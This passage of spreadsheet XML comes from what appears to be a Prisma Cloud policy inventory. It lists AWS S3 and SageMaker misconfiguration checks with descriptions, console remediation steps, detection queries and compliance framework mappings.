      <c r="AG21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08" t="inlineStr">
        <is>
          <t>e11a9695-5534-4b95-bf30-a0ba22ba045d</t>
        </is>
      </c>
      <c r="AI2108" t="inlineStr">
        <is>
          <t>5bdd77c2-4823-4d0d-90bf-ab080e2784d5</t>
        </is>
      </c>
      <c r="AJ2108" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2108" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2109">
      <c r="A2109" t="inlineStr">
        <is>
          <t>NYDFS 23 CRR-NY 500.0</t>
        </is>
      </c>
      <c r="B2109" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2109" s="2" t="inlineStr"/>
      <c r="D2109" t="inlineStr"/>
      <c r="E2109" t="inlineStr"/>
      <c r="F2109" t="inlineStr"/>
      <c r="G2109" t="b">
        <v>1</v>
      </c>
      <c r="H21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109" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2109" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2109" t="inlineStr">
        <is>
          <t>AWS S3 bucket used for storing AWS Sagemaker training job output</t>
        </is>
      </c>
      <c r="L2109" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2109" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2109" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2109" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2109" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2109" t="inlineStr">
        <is>
          <t>500.9</t>
        </is>
      </c>
      <c r="R2109" t="inlineStr">
        <is>
          <t>500.09 (b) (2)</t>
        </is>
      </c>
      <c r="S2109" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2109" t="b">
        <v>0</v>
      </c>
      <c r="U2109" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2109" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2109" t="inlineStr">
        <is>
          <t>This policy identifies the AWS S3 bucket used for storing AWS Sagemaker training job output. 
S3 buckets hold the results and artifacts generated from training machine learning models in Sagemaker. Ensuring proper configuration and access control is crucial to maintaining the security and integrity of the training output. Improperly secured S3 buckets used for storing AWS Sagemaker training output can lead to unauthorized access, data breaches, and potential exposure of sensitive model information.
It is recommended to implement strict access controls, enable encryption, and audit permissions to secure AWS S3 buckets for AWS Sagemaker training job output and ensure compliance.</t>
        </is>
      </c>
      <c r="X2109" t="inlineStr">
        <is>
          <t>To protect the S3 buckets utilized by the Sagemaker training job, please refer to the following link for recommended best practices
https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html</t>
        </is>
      </c>
      <c r="Y2109" t="inlineStr"/>
      <c r="Z2109" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' as X; config from cloud.resource where api.name = 'aws-sagemaker-training-job' as Y; filter '$.Y.OutputDataConfig.bucketName equals $.X.bucketName'; show X;</t>
        </is>
      </c>
      <c r="AA2109" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2109" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2109" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1207</t>
        </is>
      </c>
      <c r="AD2109" t="b">
        <v>1</v>
      </c>
      <c r="AE2109" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2109" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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09" t="inlineStr">
        <is>
          <t>0388b2fe-4eed-4bdb-b470-2bc3a1fc05d1</t>
        </is>
      </c>
      <c r="AI2109" t="inlineStr">
        <is>
          <t>e928a48c-c734-4d89-895f-24220616c2ef</t>
        </is>
      </c>
      <c r="AJ2109" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2109" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2110">
      <c r="A2110" t="inlineStr"/>
      <c r="B2110" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2110" s="2" t="inlineStr"/>
      <c r="D2110" t="inlineStr"/>
      <c r="E2110" t="inlineStr"/>
      <c r="F2110" t="inlineStr"/>
      <c r="G2110" t="b">
        <v>1</v>
      </c>
      <c r="H21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10" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2110" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2110" t="inlineStr">
        <is>
          <t>AWS S3 bucket used for storing AWS Bedrock Custom model training artifacts</t>
        </is>
      </c>
      <c r="L2110" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2110" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2110" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2110" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2110" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2110" t="inlineStr"/>
      <c r="R2110" t="inlineStr"/>
      <c r="S2110" t="inlineStr"/>
      <c r="T2110" t="b">
        <v>0</v>
      </c>
      <c r="U2110" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2110" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2110" t="inlineStr">
        <is>
          <t>This policy identifies the AWS S3 bucket used for storing AWS Bedrock Custom model training job output. 
S3 buckets hold the results and artifacts generated from training models in AWS Bedrock. Ensuring proper configuration and access control is crucial to maintaining the security and integrity of the training output. Improperly secured S3 buckets used for storing AWS Bedrock training output can lead to unauthorized access and potential exposure of model information.
It is recommended to implement strict access controls, enable encryption, and audit permissions to secure AWS S3 buckets for AWS Bedrock training job output and ensure compliance.
NOTE: This policy is designed to identify the S3 buckets utilized for storing results and storing artifacts generated from training custom models in AWS Bedrock. It does not signify any detected misconfiguration or security risk.</t>
        </is>
      </c>
      <c r="X2110" t="inlineStr">
        <is>
          <t>To protect the S3 buckets utilized by the AWS Bedrock Custom model training results data, please refer to the following link for recommended best practices
https://docs.aws.amazon.com/AmazonS3/latest/userguide/security-best-practices.html</t>
        </is>
      </c>
      <c r="Y2110" t="inlineStr"/>
      <c r="Z2110" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' as X; config from cloud.resource where api.name = 'aws-bedrock-custom-model' as Y; filter ' $.Y.outputDataConfig.bucketName equals $.X.bucketName'; show X;</t>
        </is>
      </c>
      <c r="AA2110" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2110" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2110" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1290</t>
        </is>
      </c>
      <c r="AD2110" t="b">
        <v>1</v>
      </c>
      <c r="AE2110" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2110" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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10" t="inlineStr">
        <is>
          <t>b4489a87-5369-43f5-8aa4-291244e697f5</t>
        </is>
      </c>
      <c r="AI2110" t="inlineStr">
        <is>
          <t>d32e315b-e88e-436d-a58e-0b6970e94d77</t>
        </is>
      </c>
      <c r="AJ2110" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2110" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2111">
      <c r="A2111" t="inlineStr"/>
      <c r="B2111" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2111" s="2" t="inlineStr"/>
      <c r="D2111" t="inlineStr"/>
      <c r="E2111" t="inlineStr"/>
      <c r="F2111" t="inlineStr"/>
      <c r="G2111" t="b">
        <v>1</v>
      </c>
      <c r="H21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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2111" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2111" t="inlineStr">
        <is>
          <t>Sensitive data exposure risk due to AWS S3 bucket encryption key not configured for key rotation</t>
        </is>
      </c>
      <c r="L2111" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2111" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2111" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2111" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2111" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2111" t="inlineStr"/>
      <c r="R2111" t="inlineStr"/>
      <c r="S2111" t="inlineStr"/>
      <c r="T2111" t="b">
        <v>0</v>
      </c>
      <c r="U2111" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2111" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2111" t="inlineStr">
        <is>
          <t>This policy identifies the potential risk of a data breach due to AWS S3 buckets containing sensitive information being encrypted with an encryption key that is not enabled for regular rotation.
The combination of a failure in Amazon S3 bucket encryption key rotation and the storage of sensitive data increases the likelihood of prolonged exposure of sensitive data and potential compliance violations.
Immediate attention is required to review and enable the automatic rotation of the KMS key used by the S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2111" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
Recommendation:
The following steps are recommended to enable the automatic rotation of the KMS key used by the S3 bucket
1. Log in to the AWS Console and navigate to the 'S3' service.
2. Click on the S3 bucket reported in the alert.
3. Click on the 'Properties' tab.
4. Under the 'Default encryption' section, click on the KMS key link in 'Encryption key ARN'.
5. Under the 'Key rotation' tab on the navigated KMS key window, Enable 'Automatically rotate this CMK every year'.
6. Click on Save.
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2111" t="inlineStr"/>
      <c r="Z2111" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket encrypted with Customer Managed Key (CMK) is not enabled for regular rotation','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2111" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2111" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:33</t>
        </is>
      </c>
      <c r="AC2111" t="inlineStr"/>
      <c r="AD2111" t="b">
        <v>1</v>
      </c>
      <c r="AE2111" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2111" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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1" t="inlineStr">
        <is>
          <t>37984c57-bba6-428e-b124-fd42a7133693</t>
        </is>
      </c>
      <c r="AI2111" t="inlineStr">
        <is>
          <t>2e436db1-24de-4624-bd57-0e9890bb2991</t>
        </is>
      </c>
      <c r="AJ2111" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2111" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2112">
      <c r="A2112" t="inlineStr"/>
      <c r="B2112" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2112" s="2" t="inlineStr"/>
      <c r="D2112" t="inlineStr"/>
      <c r="E2112" t="inlineStr"/>
      <c r="F2112" t="inlineStr"/>
      <c r="G2112" t="b">
        <v>1</v>
      </c>
      <c r="H21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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2112" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2112" t="inlineStr">
        <is>
          <t>Data breach risk due to AWS S3 bucket containing sensitive data not configured with access log feature and is accessible by unmonitored cloud accounts</t>
        </is>
      </c>
      <c r="L2112" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2112" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2112" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2112" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2112" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2112" t="inlineStr"/>
      <c r="R2112" t="inlineStr"/>
      <c r="S2112" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2112" t="b">
        <v>0</v>
      </c>
      <c r="U2112" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2112" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2112" t="inlineStr">
        <is>
          <t>This policy identifies potential data breach risk due to AWS S3 buckets containing sensitive data not configured with access log feature and are accessible by unmonitored cloud accounts.
Unmonitored cloud accounts are entities which have S3 buckets access with read/write permission opened up for Cloud Accounts which are not part of Cloud Accounts monitored by Prisma Cloud. The combination of sensitive data in the S3 bucket and Allowing unmonitored cloud accounts to access such S3 buckets can lead to data leaks and potential breaches. S3 buckets containing sensitive data should be monitored by access log feature to trail such unmonitored cloud accounts events.
Immediate attention is required to configure access log feature reported for the S3 bucket as soon as possible and enforce stricter access methods for reported S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2112" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
1. Login to the AWS Console and navigate to the 'S3' service.
2. Click on the the S3 bucket that was reported.
3. Click on the 'Properties' tab.
4. Under the 'Server access logging' section, select 'Enable logging' option.
[MISCONFIGURATION]
1. Log in to the AWS Console
2. Navigate to the 'S3' service
3. Click on the reported S3 bucket
4. Click on the 'Permissions' tab
5. Navigate to the 'Access control list (ACL)' section and Click on the 'Edit'
6. Under 'Access for other AWS accounts', Add the Cloud Accounts that are monitored by Prisma Cloud
7. Click on 'Save changes'
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2112" t="inlineStr"/>
      <c r="Z2112" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS Access logging not enabled on S3 buckets','AWS S3 bucket accessible to unmonitored cloud accounts','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2112" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2112" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:07</t>
        </is>
      </c>
      <c r="AC2112" t="inlineStr"/>
      <c r="AD2112" t="b">
        <v>1</v>
      </c>
      <c r="AE2112" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2112" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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2" t="inlineStr">
        <is>
          <t>f1031164-9454-4ec1-a052-136a661d920c</t>
        </is>
      </c>
      <c r="AI2112" t="inlineStr">
        <is>
          <t>dadf0120-3258-48cc-a114-9afd260a62fe</t>
        </is>
      </c>
      <c r="AJ2112" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2112" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2113">
      <c r="A2113" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], kfirdaus AWS Account-CS, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, NIST CSF, NIST CSF v2.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-171 Rev1, HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v9.3 [Deprecated], GDPR, Matt's ATT&amp;ACK, jbrox - GDPR, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v12, Copy of ACSC Information Security Manual (ISM)-clone, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, HITRUST CSF v.11.2.0, HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, SOC 2, Secure Controls Framework (SCF) - 2024.2, CDC NIST 800-53 Rev4, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, NIST 800-53 Rev4, NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, SOC 2, NIST SP 800-171 Revision 3, Brazilian Data Protection Law (LGPD), MAS TRM 2021, PCI DSS v4.0, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, NIST SP 800-171 Revision 3, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v6.3 [Deprecated], Risk Management in Technology (RMiT), CIS Controls v8, MLPS 2.0 (Level 2), NIST 800-171 Rev1, CyberSecurity Law of the People's Republic of China, NYDFS 23 CRR-NY 500.0, kfirdaus AWS Account-CS, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, NIST CSF, jbrox - GDPR, ISO/IEC 27001:2022, NIST 800-53 Rev4, MLPS 2.0, HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, NIST CSF v2.0, PCI DSS v3.2.1, Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, NIST CSF, PIPEDA, MLPS 2.0 (Level 3), ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, SOC 2, HITRUST CSF v.9.6.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, kashan ACSC Information Security Manual (ISM), CSA CCM v3.0.1, CCPA 2018, ACSC Information Security Manual (ISM), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ACSC Information Security Manual (ISM), NIST 800-171 Rev1, NIST CSF, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, CSA CCM v3.0.1, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-171 Rev1, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2113" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2113" s="2" t="inlineStr"/>
      <c r="D2113" t="inlineStr"/>
      <c r="E2113" t="inlineStr"/>
      <c r="F2113" t="inlineStr"/>
      <c r="G2113" t="b">
        <v>1</v>
      </c>
      <c r="H21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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2113" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2113" t="inlineStr">
        <is>
          <t>AWS S3 buckets are accessible to any authenticated user</t>
        </is>
      </c>
      <c r="L2113" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2113" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2113" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2113" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2113" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2113" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2113" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S2113" t="inlineStr">
        <is>
          <t>Attack Path Rule,PCI DSS v3.2</t>
        </is>
      </c>
      <c r="T2113" t="b">
        <v>0</v>
      </c>
      <c r="U2113" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2113" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2113" t="inlineStr">
        <is>
          <t>This policy identifies S3 buckets accessible to any authenticated AWS users. Amazon S3 allows customer to store and retrieve any type of content from anywhere in the web. Often, customers have legitimate reasons to expose the S3 bucket to public, for example to host website content. However, these buckets often contain highly sensitive enterprise data which if left accessible to anyone with valid AWS credentials, may result in sensitive data leaks.</t>
        </is>
      </c>
      <c r="X2113" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console
2. Navigate to the 'S3' service
3. Click on the 'S3' resource reported in the alert
4. Click on the 'Permissions'
5. Under 'Public access', Click on 'Any AWS user' and uncheck all items
6. Click on Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-s3-bucket-does-not-allow-access-to-all-authenticated-users
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-s3-bucket-does-not-allow-access-to-all-authenticated-users</t>
        </is>
      </c>
      <c r="Y2113" t="inlineStr"/>
      <c r="Z2113" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-s3api-get-bucket-acl' AND json.rule = 'acl.grants[*].grantee contains AuthenticatedUsers'
{"category":"IAM","resourceTypes":["aws_s3_bucket_acl"]}</t>
        </is>
      </c>
      <c r="AA2113" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2113" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2113" t="inlineStr">
        <is>
          <t>PC-AWS-S3-33-CKV2_AWS_43</t>
        </is>
      </c>
      <c r="AD2113" t="b">
        <v>1</v>
      </c>
      <c r="AE2113" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2113" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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3" t="inlineStr">
        <is>
          <t>e8af29c5-eec9-433d-a46b-690c1a286e9b</t>
        </is>
      </c>
      <c r="AI2113" t="inlineStr">
        <is>
          <t>9c8333d7-0670-4422-8b8c-70cd8ef2701e</t>
        </is>
      </c>
      <c r="AJ2113" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2113" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2114">
      <c r="A2114" t="inlineStr">
        <is>
          <t>HIPAA, GDPR, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, SOC 2, DORA, ITSG-33, Microsoft Cloud Security Benchmark v1, SOC 2, TX-RAMP Level 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2114" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2114" s="2" t="inlineStr"/>
      <c r="D2114" t="inlineStr"/>
      <c r="E2114" t="inlineStr"/>
      <c r="F2114" t="inlineStr"/>
      <c r="G2114" t="b">
        <v>1</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2114" t="inlineStr">
        <is>
          <t>aws-sagemaker</t>
        </is>
      </c>
      <c r="K2114" t="inlineStr">
        <is>
          <t>AWS SageMaker endpoint data encryption at rest not configured with CMK</t>
        </is>
      </c>
      <c r="L2114" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2114" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2114" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2114" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2114" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2114" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2114" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2114" t="inlineStr"/>
      <c r="T2114" t="b">
        <v>0</v>
      </c>
      <c r="U2114" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2114" t="inlineStr">
        <is>
          <t>aws-sagemaker-endpoint-config</t>
        </is>
      </c>
      <c r="W2114" t="inlineStr">
        <is>
          <t>This policy identifies AWS SageMaker Endpoints not configured with data encryption at rest.
AWS SageMaker Endpoint configuration defines the resources and settings for deploying machine learning models to SageMaker endpoints. By default, SageMaker encryption uses transient keys if a KMS key is not specified, which does not provide the control and management benefits of AWS Customer Managed KMS Key. Enabling the encryption helps protect the integrity and confidentiality of the data on the storage volume attached to the ML compute instance that hosts the endpoint.
It is recommended to set encryption at rest to mitigate the risk of unauthorized access and potential data breaches.</t>
        </is>
      </c>
      <c r="X2114" t="inlineStr">
        <is>
          <t>To ensure that SageMaker endpoint configuration with data encryption using the KMS key, you must create a new EndpointConfig by cloning the existing endpoint configuration used by the endpoint and update it with the required changes.
1. Sign in to the AWS Management Console.
2. Go to the SageMaker service dashboard at https://console.aws.amazon.com/sagemaker/.
3. In the navigation panel, under Inference, choose Endpoint configurations.
4. Select the SageMaker endpoint that is reported, Click on clone on top right corner.
5. Give a name to the Endpoint configuration and choose the Encryption key. For AWS Managed Keys, enter a KMS key ARN. For customer-managed keys, choose one from the drop-down.
6. Click Create endpoint configuration.
To update the endpoint using the endpoint configuration:
1. Sign in to the AWS Management Console.
2. Go to the SageMaker service dashboard at https://console.aws.amazon.com/sagemaker/.
3. In the navigation panel, under Inference, choose Endpoints.
4. Select the SageMaker endpoint that you want to examine, then click on it to access the resource configuration details under the "settings" tab.
5. Scroll down to Endpoint Configuration Settings and click Change.
6. choose to "use an existing endpoint configuration" and select the Endpoint configuration which is created earlier with encryption key specified.
7. Click "Select endpoint configuration" and click "Update Endpoint" for changes to propagate. 
Build Recommendation: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/aws-policies/aws-general-policies/bc-aws-general-40.html
IaC: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/aws-policies/aws-general-policies/bc-aws-general-40.html</t>
        </is>
      </c>
      <c r="Y2114" t="inlineStr"/>
      <c r="Z2114" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name = 'aws-sagemaker-endpoint-config' as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' as Y; config from cloud.resource where api.name = 'aws-sagemaker-endpoint' AND json.rule = endpointStatus does not equal "Failed" as Z; filter '($.X.KmsKeyId does not exist or (($.X.KmsKeyId exists and $.Y.keyMetadata.keyState equals Disabled) and $.X.KmsKeyId equals $.Y.keyMetadata.arn)) and ($.X.EndpointConfigName equals $.Z.endpointConfigName)' ; show X;
{"category":"General","resourceTypes":["aws_sagemaker_endpoint_configuration"]}</t>
        </is>
      </c>
      <c r="AA2114" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2114" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2114" t="inlineStr">
        <is>
          <t>PC-AWS-SGM-1103-CKV_AWS_98</t>
        </is>
      </c>
      <c r="AD2114" t="b">
        <v>1</v>
      </c>
      <c r="AE2114" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2114" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
